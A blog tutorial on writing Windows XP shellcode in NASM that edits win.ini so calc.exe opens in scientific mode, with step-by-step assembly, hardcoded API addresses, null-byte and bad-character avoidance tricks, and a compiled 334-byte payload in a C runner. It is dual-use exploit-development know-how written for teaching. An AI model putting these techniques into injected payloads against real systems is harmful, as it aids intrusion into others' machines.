TL;DR The Shellcode and The Assembly (NASM)
I'll start this off by tipping my hat to @mattifestation (writer of the Exploit Monday blog) for writing this blogpost a few years ago which inspired me down this ridiculous path.
I spent the better part of my weekend wrestling with writing my own implementation of the idea for Windows XP. Turns out there's a bit more involved than I originally thought. Or not, if you know about WriteProfileString(), which I discovered days later.
But first, a demo ;)

Let's dive into how it works, shall we? To the ProcMon!

Groovy. In his article @mattifestation discovers that it's a simple registry entry that gets written to, but apparently that's not the case here. Let's take a look at C:\windows\win.ini, as that looks to be the only non-binary file accessed.

Oh great. It's a configuration file. Really?
/me rages
So basically if layout=1 is in the win.ini file, then it'll display regular calc, if layout=0, it'll be scientific calc. Cool, we know what needs to happen.
Diving head first, I break the problem down into smaller steps.
- Open the file for reading and writing
- Read in the file
- Find the offset of the byte I want to change
- Change the byte
- Write the file
- WinExec() calc.exe
--- Optional ---
- Change the byte back
- Re-write the file
- Exit cleanly
Anyway, this ends up being more steps than just that, but I'll be breaking it down step-by-step.
Step 1.) Open the file for reading and writing
Here's the code to do it. It's easier to reference if it's at the top of this section.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call CreateFileA with C:\windows\win.ini ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
MOV AX, 0x696E ; Load "ni" into the low word (upper word stays null)
PUSH EAX ; (ni..)
PUSH 0x692e6e69 ; (in.i)
PUSH 0x775c7377 ; (ws\w)
PUSH 0x6f646e69 ; (indo)
PUSH 0x775c3a43 ; (C:\w)
MOV EDX,ESP ; Store pointer into EDX
XOR EAX,EAX ; Null out EAX
PUSH EAX ; hTemplateFile = NULL
XOR EBX,EBX ; Clear EBX
MOV BL,0x80 ; Put 0x80 in lower
PUSH EBX ; PUSH EBX
PUSH byte 0x04 ; 4 = OPEN_ALWAYS
PUSH EAX ; LPSECURITY = 0
PUSH byte 0x01 ; 1 = FILE_SHARE_READ
MOV EAX,0xD1111111 ; Load 0xd1111111 (masked so there are no null bytes)
SUB EAX,0x11111111 ; 0xd1111111 - 0x11111111 == 0xc0000000
PUSH EAX ; Push (GENERIC_READ | GENERIC_WRITE)
PUSH EDX ; Filename
MOV EDX,0x7c802b28 ; Have to mask this for some reason
SUB DH,0x11 ; Compiler barfs at 1a, and stops :-/
CALL EDX ; Call CreateFileA()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
So the prototype of CreateFileA() looks like the following:
HANDLE WINAPI CreateFile(
_In_ LPCTSTR lpFileName,
_In_ DWORD dwDesiredAccess,
_In_ DWORD dwShareMode,
_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
_In_ DWORD dwCreationDisposition,
_In_ DWORD dwFlagsAndAttributes,
_In_opt_ HANDLE hTemplateFile
);
So what we're essentially doing in the above code is this:
HANDLE fHandle = CreateFile(
"C:\\windows\\win.ini", // lpFileName | Path to our file
(GENERIC_READ | GENERIC_WRITE), // dwDesiredAccess | == 0xc0000000 (read and write access)
FILE_SHARE_READ, // dwShareMode | == 0x00000001 (allows other programs to open for reading)
NULL, // lpSecurityAttributes | == 0x00000000 (don't need it)
OPEN_ALWAYS, // dwCreationDisposition | == 0x00000004 (opens the file if it exists, creates it otherwise)
FILE_ATTRIBUTE_NORMAL, // dwFlagsAndAttributes | == 0x00000080 (normal file, nothing special about it)
NULL // hTemplateFile | == 0x00000000 (don't need a template file)
);
After we make a CALL to CreateFileA() with these arguments pushed onto the stack, we're given back a valid file handle (stored in EAX). Hooray!
One very important thing to note is how I pushed the arguments onto the stack. I imagine turning the function prototype 90 degrees clockwise and having it sit on top of the stack. Your arguments need to line up like that, and since the stack grows down as you PUSH things onto it, the last argument goes on first. This is the reason why we push the first argument (filename) last.
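The same "last thing first" rule applies to the strings we push. Here's a rough Python sketch (Python since that's what the exploit scripts in this series use) that splits a string into the little-endian DWORDs you'd PUSH, in push order. The helper name push_dwords is made up for illustration, it's not part of any tool.

```python
import struct

def push_dwords(text):
    """Return the DWORD values to PUSH, in push order, so that `text`
    ends up null-terminated in memory starting at ESP."""
    data = text.encode("ascii")
    # Always pad with at least one NUL, up to the next 4-byte boundary.
    # Real shellcode has to build those NULs indirectly (XOR EAX,EAX etc).
    data += b"\x00" * (4 - len(data) % 4)
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows down, so the last chunk of the string is pushed first.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]

for value in push_dwords("C:\\windows\\win.ini"):
    print("PUSH 0x%08x" % value)
```

The values it prints line up with the PUSH sequence in the CreateFileA() block above, with the first one (0x0000696e) being the DWORD the shellcode builds in EAX to dodge the null bytes.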
Step 2.) Read in the file
This actually needs to be broken down into multiple sections, since "reading a file" isn't quite so simple in assembly.
Step 2a.) Get the file size
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call GetFileSize([HANDLE]"C:\windows\win.ini") ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUSH EAX ; Push File Handle (later storage)
XOR ECX,ECX ; Clear ECX
PUSH ECX ; Push 0
PUSH EAX ; Push File Handle argument
MOV ESI,0x7c810fef ; Call GetFileSize()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
The prototype for this function looks like this:
DWORD WINAPI GetFileSize(
_In_ HANDLE hFile,
_Out_opt_ LPDWORD lpFileSizeHigh
);
Our assembly is fairly straightforward. Since EAX still holds our file handle, we just push it onto the stack for future use (we WILL need it later on), and call GetFileSize() like this:
GetFileSize(
fHandle, // hFile | Our file handle (duh)
NULL // lpFileSizeHigh | No need for the high-order DWORD, the file size will be in EAX
);
Step 2b.) Allocate the size of the file +1
Now we need somewhere to put this file when we read it into memory, so we use our old friend malloc() to allocate a buffer for us. We ask for (file size + 1) bytes so that after we set the buffer to all NULLs, the file contents will absolutely be null-terminated.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call malloc() with file size +1 ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
INC EAX ; EAX == File size (add one to it for null terminator)
PUSH EAX ; Push FileSize + 1 as argument
MOV ESI,0x77c2c407 ; Pointer to malloc()
CALL ESI ; Call malloc()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Malloc() takes one argument, the desired size of the buffer, so there's not much explaining that needs to happen. EAX holds our desired size at this point.
After the call, this returns a pointer to our allocated buffer into EAX for further use!
Step 2c.) Zero out the memory for good measure (make sure it's null terminated!)
I'm not entirely convinced that this is necessary, but skipping it has the potential to cause issues later, since strstr() expects the file contents to be null-terminated. Zeroing this out also helped me confirm I was in the right place while debugging.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call memset() to zero out our buffer ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR ECX,ECX ; Clear ECX
MOV EDX,[ESP] ; Put FileSize + 1 as the buffer size into EDX
PUSH EDX ; Push FileSize + 1 as an argument
PUSH ECX ; Fill with 0's
PUSH EAX ; Start at begining of malloc()'d memory
MOV ESI,0x77c475f0 ; Pointer to memset()
CALL ESI ; Call memset()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
The memset() prototype:
void *memset(
void *dest,
int c,
size_t count
);
The call we replicate:
memset(
MallocBuf, // dest | Pointer to our malloc()'d buffer
0, // c | Fill the memory with NULL bytes
FileSize + 1 // count | Our file size + 1
);
After we make the call, you can verify that the memory is zeroed out by following the pointer returned from malloc(). You should see a whole mess of NULLs :)
Step 2d.) Random pointer juggling
At this point we need to grab some things off the stack for our ReadFile() call
;;;;;;;;;;;;;;;;;;;;;;;;;
;; Random Juggle time! ;;
;;;;;;;;;;;;;;;;;;;;;;;;;
MOV ECX,[ESP-0x10] ; Put file size into ECX
PUSH ECX ; Push a dummy value so we don't try ESP+10 (has a \x0a in it :-/)
MOV EDX,[ESP+0x14] ; Put file handle to EDX
;;;;;;;;;;;;;;;;;;;;;;;;;
I had to do something interesting here by pushing an unused value onto the stack. That's because the instruction I originally wanted assembled to bytes containing a \x0a character, and since I was writing this for a string-based buffer overflow, it was causing my shellcode to truncate. Sad panda.
The rest is pretty self-explanatory. At this point ECX == file size, and EDX == our file handle.
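Hunting bad characters by eye gets old fast, so here's a tiny Python sketch that scans a blob of shellcode for them. The bad character set is an assumption on my part (NUL and newline came up in this post, carriage return is a common third), so adjust it for whatever your target's input handling chokes on.

```python
BAD_CHARS = b"\x00\x0a\x0d"  # assumed bad set: NUL, LF, CR

def find_bad_chars(shellcode, bad=BAD_CHARS):
    """Return (offset, byte) pairs for every bad byte found in shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]

# First bytes of the CreateFileA() stub from the shellcode in this post.
stub = b"\x31\xc0\x66\xb8\x6e\x69\x50\x68\x69\x6e\x2e\x69"
print(find_bad_chars(stub))

# MOV EAX,0x7c81d20a assembled directly: the 0x0a lands in the immediate.
print(find_bad_chars(b"\xb8\x0a\xd2\x81\x7c"))
```

Running something like this over the final byte string before dropping it into an exploit saves a round trip through the debugger.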
Step 2e.) Call ReadFile() to finally read the file in!
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call ReadFile('C:\windows\win.ini') into malloc() from above ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR ESI,ESI ; Clear ESI
PUSH ESI ; Push a null onto the stack (address to be saved later)
PUSH ESI ; (NULL) _Inout_opt_ LPOVERLAPPED lpOverlapped
MOV ESI,ESP ; Move ESP -> ESI
ADD ESI, byte 0x04 ; Add 0x04 to our ESP
PUSH ESI ; (Pointer to 0x0) _Out_opt_ LPDWORD lpNumberOfBytesRead,
PUSH ECX ; (FSiZ) _In_ DWORD nNumberOfBytesToRead,
PUSH EAX ; (BUFF) _Out_ LPVOID lpBuffer,
PUSH EDX ; (HNDL) _In_ HANDLE hFile,
MOV ESI,0x7c801812 ; Pointer to ReadFile()
CALL ESI ; Call ReadFile()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Same drill as before, the prototype:
BOOL WINAPI ReadFile(
_In_ HANDLE hFile,
_Out_ LPVOID lpBuffer,
_In_ DWORD nNumberOfBytesToRead,
_Out_opt_ LPDWORD lpNumberOfBytesRead,
_Inout_opt_ LPOVERLAPPED lpOverlapped
);
And the call we're making:
ReadFile(
fHandle, // hFile | Our file handle for C:\windows\win.ini
MallocBuf, // lpBuffer | Our pointer to our malloc()'d/zeroed buffer
BytesToRead, // nNumberOfBytesToRead | The number of bytes we want to read in (the whole file)
&BytesRead, // lpNumberOfBytesRead | A pointer to a DWORD that receives the number of bytes read, since the call itself returns BOOL
NULL // lpOverlapped | Only necessary if we'd used an overlapped flag with CreateFile()
);
After that our buffer is magically filled with the file contents, and we're one step closer to popping a scientific calc!
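If the assembly is hard to follow, steps 2a through 2e boil down to something like this in Python. This is just a sketch of the same sequence (size, allocate size + 1 zeroed bytes, read), not a translation of the shellcode, and the sample file contents are made up.

```python
import os
import tempfile

def read_with_terminator(path):
    """Size the file, allocate size + 1 zeroed bytes, then read the
    whole file into the front of that buffer."""
    size = os.path.getsize(path)      # GetFileSize()
    buf = bytearray(size + 1)         # malloc() + memset(): bytearray starts zero-filled
    with open(path, "rb") as f:       # CreateFileA()
        read = f.readinto(memoryview(buf)[:size])  # ReadFile()
    return buf, read

# Demo on a throwaway file holding a made-up win.ini fragment.
with tempfile.NamedTemporaryFile(delete=False, suffix=".ini") as tmp:
    tmp.write(b"[SciCalc]\r\nlayout=1\r\n")
buf, read = read_with_terminator(tmp.name)
os.remove(tmp.name)
print(read, buf[-1])
```

The trailing zero byte is the whole point of the "+ 1": anything that walks the buffer as a C string later has somewhere to stop.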
Step 3.) Find the offset to the byte I want to change
I opted for the strstr() function to do this. There are many other ways to do it, but this just seemed the easiest.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call strstr($filecontents,'[SciCalc]') ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP-0x10] ; Pop out location to the file contents into EAX
PUSH byte 0x5d ; 0x0000005d ( ]) ;)
PUSH 0x636c6143 ; (Calc)
PUSH 0x6963535b ; ([Sci)
MOV EBX,ESP ; Put pointer to our string into EBX
PUSH EBX ; String to search for ([SciCalc])
PUSH EAX ; String to be scanned (file contents)
MOV ESI,0x77c47c60 ; Pointer to strstr()
CALL ESI ; Call strstr()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
For brevity's sake, this is just a string match. I push in a pointer to the string I'm trying to match ([SciCalc]) and a pointer to the string to match against (the file contents), and it gives me back a pointer to the match in EAX.
Step 4.) Change that byte!
Next we want to skip ahead until we hit the single byte we want to change (0x31 or ascii "1"), then use memset() again to change that single byte to 0x30 (ascii "0")
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Set our byte to 0 with memset() ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ADD EAX, byte 0x12 ; Move pointer 0x12 ahead (skip to 0/1)
PUSH byte 0x01 ; Change one byte
PUSH byte 0x30 ; Char to change to 0x30 (ascii "0")
PUSH EAX ; Push Memory location to change
MOV ESI,0x77c475f0 ; Pointer to memset()
CALL ESI ; Call memset()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
At this point the function calls are using nothing but pointers, file handles, and the random integer/dword, so it's probably not too helpful to keep showing the calls we're making. The prototype for memset() is up above if you need it.
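Steps 3 and 4 together are really just "find the section, skip 0x12 bytes, overwrite one byte". A quick Python sketch of that logic is below. It assumes, like the shellcode does, that layout= is the first key right after the [SciCalc] header and that lines end in \r\n. The sample contents are invented.

```python
SECTION = b"[SciCalc]"
LAYOUT_OFFSET = 0x12  # len("[SciCalc]") + len("\r\n") + len("layout=")

def set_layout(contents, digit):
    """Return a copy of contents with the layout digit replaced."""
    start = contents.find(SECTION)               # strstr()
    if start < 0:
        raise ValueError("no [SciCalc] section found")
    patched = bytearray(contents)
    patched[start + LAYOUT_OFFSET] = ord(digit)  # memset(ptr, digit, 1)
    return bytes(patched)

sample = b"[fonts]\r\n[SciCalc]\r\nlayout=1\r\n"  # assumed file layout
print(set_layout(sample, "0"))
```

Note that the shellcode skips the "not found" check entirely. If strstr() comes back with NULL, the memset() that follows writes to address 0x12 and the process dies.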
Step 5.) Write the file back to disk
Another two-parter. After reading the file from disk, it turns out our file pointer is at the end of the file! So if we write it back now, we end up just appending our data. We want to replace!
Step 5a.)
Here we call SetFilePointer() with our file handle and all nulls to tell it to reset the file pointer to the start of the file
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call SetFilePointer() to reset ;;
;; file pointer to begining ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EDX,[ESP+0x38] ; Find handle on stack
XOR EAX,EAX ; Clear EAX
PUSH EAX ; dwMoveMethod (FILE_BEGIN)
PUSH EAX ; lpDistanceToMoveHigh (0)
PUSH EAX ; lDistanceToMove (0)
PUSH EDX ; hFile
MOV ESI,0x7c811106 ; Call SetFilePointer()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
BOOM! Easy.
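The same gotcha exists in any language that hands you a file position. Here's a minimal Python sketch of the read, rewind, write sequence on a throwaway file. The helper name and sample contents are just for illustration.

```python
import os
import tempfile

def rewrite_in_place(path, patch):
    """Read a file, patch its contents, and write them back over the original."""
    with open(path, "r+b") as f:
        data = f.read()       # leaves the file pointer at end-of-file
        f.seek(0)             # SetFilePointer(hFile, 0, NULL, FILE_BEGIN)
        f.write(patch(data))  # same length, so this replaces rather than appends

with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"layout=1\r\n")
rewrite_in_place(tmp.name, lambda d: d.replace(b"=1", b"=0"))
with open(tmp.name, "rb") as f:
    result = f.read()
os.remove(tmp.name)
print(result)
```

This only works cleanly because the patched data is exactly as long as the original. If it were shorter, you'd also need to truncate the file.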
Step 5b.)
Now we can actually call WriteFile() to write our file back to the filesystem
;;;;;;;;;;;;;;;;;;;;;;
;; Call WriteFile() ;;
;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Blank out EAX
PUSH EAX ; Reserve a zeroed DWORD to act as our "NumberOfBytesWritten" variable
MOV EAX,ESP ; EAX = pointer to that DWORD
XOR ECX,ECX ; Blank out ECX
PUSH ECX ; lpOverlapped == NULL
PUSH EAX ; lpNumberOfBytesWritten == Pointer -> 0
MOV ECX,[ESP+0x2C] ; Move file size into ECX
MOV EDX,[ESP+0x18] ; Move pointer to file data into EDX
MOV ESI,[ESP+0x44] ; Move file handle into ESI
PUSH ECX ; nNumberOfBytesToWrite
PUSH EDX ; lpBuffer
PUSH ESI ; hFile
MOV ESI,0x7c8112ff ; Call WriteFile()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;
The prototype for WriteFile() is:
BOOL WINAPI WriteFile(
_In_ HANDLE hFile,
_In_ LPCVOID lpBuffer,
_In_ DWORD nNumberOfBytesToWrite,
_Out_opt_ LPDWORD lpNumberOfBytesWritten,
_Inout_opt_ LPOVERLAPPED lpOverlapped
);
Pretty straightforward again, not much to note beyond the comments in the ASM.
Step 6.) Pop a calc.exe
It's time! It's finally time to pop the calc! We do so with a simple call to WinExec()
;;;;;;;;;;;;;;;;;;;;;;;;;
;; WinExec('calc.exe') ;;
;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
PUSH EAX ; Null terminate string
PUSH 0x6578652e ; (.exe)
PUSH 0x636c6163 ; (calc)
PUSH ESP ; Stack pointer == our data
MOV ESI,0x7c862585 ; Call WinExec()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;
Again, this should be self-explanatory. It just launches calc, but since we've changed the layout parameter in win.ini, it'll spawn a scientific calculator! Hooray!
Optional stuffs
From here on out, we're basically just working backwards, re-writing the byte to standard calc, resetting the file pointer, and re-writing the file. After all that we just exit(0)! Good times.
Step 7.) Change that byte back
This is the opposite of what we did in step 4, we change it back to ascii "1"
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Set our byte back to 1 with memset() ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP+0x0C] ; Pop pointer to "0"
PUSH byte 0x01 ; Change one byte
PUSH byte 0x31 ; Char to change to 0x31 (ascii "1")
PUSH EAX ; Push Memory location to change
MOV ESI,0x77c475f0 ; Call memset()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
This is accomplished in much the same way, pop the pointer to our value we want to change off the stack, push the rest of our arguments (1 byte changed to 0x31), and make the call!
Step 8.) Write the file back to disk (again)
Another 2 parter, much like the original, we need to reset the file pointer first.
Step 8a.)
SetFilePointer() is your friend! Especially with how few bytes it takes to call it :)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call SetFilePointer() to reset ;;
;; file pointer to begining ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EDX,[ESP+0x50] ; Find handle on stack
XOR EAX,EAX ; Clear EAX
PUSH EAX ; dwMoveMethod (FILE_BEGIN)
PUSH EAX ; lpDistanceToMoveHigh (0)
PUSH EAX ; lDistanceToMove (0)
PUSH EDX ; hFile
MOV ESI,0x7c811106 ; Pointer to SetFilePointer()
CALL ESI ; Call SetFilePointer()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Pretty self-explanatory again, just push in our file handle and a few nulls, and boom, you got yourself a stew.
Step 8b.)
Now we call WriteFile() again, literally the same exact call that we made last time.
;;;;;;;;;;;;;;;;;;;;;;
;; Call WriteFile() ;;
;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,ESP ; Push current stack pointer as a "NumberOfBytesWritten" variable
XOR EDX,EDX ; Clear EDX
PUSH EDX ; lpOverlapped == NULL
PUSH EAX ; lpNumberOfBytesWritten == Pointer -> 0
MOV ECX,[ESP+0x1C] ; Move file size into ECX
MOV EDX,[ESP+0x2C] ; Move pointer to file data into EDX
MOV ESI,[ESP+0x58] ; Move file handle into ESI
PUSH ECX ; nNumberOfBytesToWrite
PUSH EDX ; lpBuffer
PUSH ESI ; hFile
MOV ESI,0x7c8112ff ; Pointer to WriteFile()
CALL ESI ; Call WriteFile()
;;;;;;;;;;;;;;;;;;;;;;
Nothing's changed, but our file is all cleaned up and we can finally exit!
Step 9.) Cleanup
It's always good to get here. Usually means that things didn't crash, and that your shellcode executed perfectly.
First thing we want to do is close the file handle, which, if you've done any file programming, shan't need explaining.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; CloseHandle(fileHandle) ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP-0x14] ; Find handle
PUSH EAX ; Push handle onto stack
MOV ESI,0x7c809be7 ; Call CloseHandle()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Now that it's closed, we can finally exit our process somewhat gracefully (it is a crash after all).
;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call ExitProcess(0)  ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
PUSH EAX ; Push 0x00 (exit(0))
MOV EAX,0x7c81d21b ; Avoid \x0a character
SUB AL, 0x11 ; Subtract mask (0x1b - 0x11 == 0x0a)
JMP EAX ; JMP - No turning back!
;;;;;;;;;;;;;;;;;;;;;;;;;;
A CALL would've sufficed here as well, but I figured we have no need to return! The reason I do the SUB AL,0x11 is that NASM seems to blarf a bit when processing certain opcodes. I haven't figured out why, so I just got around it. The final shellcode could very easily have had that value changed by hand to the hex equivalent, but I don't really see it as necessary, as it only saves a few bytes.
Ta-da! Executed scientific calc with 334 bytes of shellcode. The actual code for the exploit in the demo is even smaller because I only had ~327 bytes to work with, so there I don't bother clearing some registers. You never know what sort of shape your registers are in when your shellcode starts, though, so I went back and dotted the i's and crossed the t's, if you will.
That was a lot of material, but hopefully it's presented clearly enough that it can be deciphered after a few reads. It'll definitely help to refer to my exploitation primer part 2, so you can understand why we do some memory address juggling to remove null bytes, and how we set up our arguments for each system call we make.
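Whatever the root cause of the bad bytes, the masking arithmetic itself is easy to sanity check. Below is a small Python sketch that works out the value to load so that a following SUB AL,mask lands on the real address. The helper name and the bad byte set are my own assumptions, and it only handles the low byte (the SUB AL case used for ExitProcess above).

```python
def mask_address(target, mask=0x11, bad=b"\x00\x0a\x0d"):
    """Return (loaded_value, mask): MOV EAX,loaded_value then SUB AL,mask
    arrives at target without a bad byte in the low position."""
    low = (target & 0xFF) + mask
    if low > 0xFF:
        raise ValueError("mask overflows the low byte, pick a smaller one")
    loaded = (target & 0xFFFFFF00) | low
    if any(b in bad for b in loaded.to_bytes(4, "little")):
        raise ValueError("masked value still contains a bad byte")
    return loaded, mask

loaded, mask = mask_address(0x7c81d20a)
print("MOV EAX,0x%08x / SUB AL,0x%02x" % (loaded, mask))

# The full-register variant used for the CreateFileA() access flags.
print(hex(0xD1111111 - 0x11111111))
```

Since SUB AL only touches the low byte of EAX, there's no borrow into the rest of the address to worry about, which is why the check stays this simple.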
Having said that though, here's the whole thing, already compiled with NASM and ready to go!
As a side-note, I added a Sleep() call to delay execution just slightly after calling WinExec(). I was running into a race condition where I'd revert the change too quickly and calc would read the old value.
// Scientific Calc (334 Bytes)
char code[] =
"\x31\xc0\x66\xb8\x6e\x69\x50\x68\x69\x6e\x2e\x69"
"\x68\x77\x73\x5c\x77\x68\x69\x6e\x64\x6f\x68\x43"
"\x3a\x5c\x77\x89\xe2\x31\xc0\x50\x31\xdb\xb3\x80"
"\x53\x6a\x04\x50\x6a\x01\xb8\x11\x11\x11\xd1\x2d"
"\x11\x11\x11\x11\x50\x52\xba\x28\x2b\x80\x7c\x80"
"\xee\x11\xff\xd2\x50\x31\xc9\x51\x50\xbe\xef\x0f"
"\x81\x7c\xff\xd6\x40\x50\xbe\x07\xc4\xc2\x77\xff"
"\xd6\x31\xc9\x8b\x14\x24\x52\x51\x50\xbe\xf0\x75"
"\xc4\x77\xff\xd6\x8b\x4c\x24\xf0\x51\x8b\x54\x24"
"\x14\x31\xf6\x56\x56\x89\xe6\x83\xc6\x04\x56\x51"
"\x50\x52\xbe\x12\x18\x80\x7c\xff\xd6\x8b\x44\x24"
"\xf0\x6a\x5d\x68\x43\x61\x6c\x63\x68\x5b\x53\x63"
"\x69\x89\xe3\x53\x50\xbe\x60\x7c\xc4\x77\xff\xd6"
"\x83\xc0\x12\x6a\x01\x6a\x30\x50\xbe\xf0\x75\xc4"
"\x77\xff\xd6\x8b\x54\x24\x38\x31\xc0\x50\x50\x50"
"\x52\xbe\x06\x11\x81\x7c\xff\xd6\x31\xc0\x50\x89"
"\xe0\x31\xc9\x51\x50\x8b\x4c\x24\x2c\x8b\x54\x24"
"\x18\x8b\x74\x24\x44\x51\x52\x56\xbe\xff\x12\x81"
"\x7c\xff\xd6\x31\xc0\x50\x68\x2e\x65\x78\x65\x68"
"\x63\x61\x6c\x63\x54\xbe\x85\x25\x86\x7c\xff\xd6"
"\x8b\x44\x24\x0c\x6a\x01\x6a\x31\x50\xbe\xf0\x75"
"\xc4\x77\xff\xd6\x8b\x54\x24\x50\x31\xc0\x50\x50"
"\x50\x52\xbe\x06\x11\x81\x7c\xff\xd6\x6a\x79\xbe"
"\x46\x24\x80\x7c\xff\xd6\x89\xe0\x31\xd2\x52\x50"
"\x8b\x4c\x24\x1c\x8b\x54\x24\x2c\x8b\x74\x24\x58"
"\x51\x52\x56\xbe\xff\x12\x81\x7c\xff\xd6\x8b\x44"
"\x24\xec\x50\xbe\xe7\x9b\x80\x7c\xff\xd6\x31\xc0"
"\x50\xb8\x1b\xd2\x81\x7c\x2c\x11\xff\xe0";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
A special thanks to @corelanc0d3r for the shellcode.c program. Super handy!
Just before writing this article, I was digging around calc.exe to see what else it was reading out of the win.ini file, which (of course) was when I discovered the WriteProfileString function. This is the part where I facepalm.
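For the curious, here's roughly what the facepalm-inducing shortcut looks like from Python using ctypes. Treat it as an untested sketch: WriteProfileStringA() is a real kernel32 export that takes a section, a key, and a value, but the wrapper name is mine, and the section and key names are simply the ones seen in win.ini earlier in this post.

```python
import ctypes
import sys

def set_calc_layout(value):
    """Set layout=<value> under [SciCalc] in win.ini via WriteProfileStringA()."""
    if sys.platform != "win32":
        raise OSError("WriteProfileStringA is only available on Windows")
    ok = ctypes.windll.kernel32.WriteProfileStringA(
        b"SciCalc",                  # lpAppName: section name, without brackets
        b"layout",                   # lpKeyName
        str(value).encode("ascii"),  # lpString
    )
    if not ok:
        raise ctypes.WinError()
    return True

# Usage on the XP box would be: set_calc_layout(0), then launch calc.exe.
```

One call replaces the whole open, read, search, patch, seek, write dance, which is exactly why it stings.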
[BITS 32]
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call CreateFileA with C:\windows\win.ini ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX
MOV AX, 0x696E ; Load "ni" into the low word (upper word stays null)
PUSH EAX ; (ni..)
PUSH 0x692e6e69 ; (in.i)
PUSH 0x775c7377 ; (ws\w)
PUSH 0x6f646e69 ; (indo)
PUSH 0x775c3a43 ; (C:\w)
MOV EDX,ESP ; Store pointer into EDX
XOR EAX,EAX ; Null out EAX
PUSH EAX ; hTemplateFile = NULL
XOR EBX,EBX ; Clear EBX
MOV BL,0x80 ; Put 0x80 in lower
PUSH EBX ; PUSH EBX
PUSH byte 0x04 ; 4 = OPEN_ALWAYS
PUSH EAX ; LPSECURITY = 0
PUSH byte 0x01 ; 1 = FILE_SHARE_READ
MOV EAX,0xD1111111 ; Load 0xd1111111 (masked so there are no null bytes)
SUB EAX,0x11111111 ; 0xd1111111 - 0x11111111 == 0xc0000000
PUSH EAX ; Push (GENERIC_READ | GENERIC_WRITE)
PUSH EDX ; Filename
MOV EDX,0x7c802b28 ; Have to mask this for some reason
SUB DH,0x11 ; Compiler barfs at 1a, and stops :-/
CALL EDX ; Call CreateFileA()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call GetFileSize([HANDLE]"C:\windows\win.ini") ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUSH EAX ; Push File Handle (later storage)
XOR ECX,ECX ; Clear ECX
PUSH ECX ; Push 0
PUSH EAX ; Push File Handle argument
MOV ESI,0x7c810fef ; Pointer to GetFileSize()
CALL ESI ; Call GetFileSize()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call malloc() with file size +1 ;;
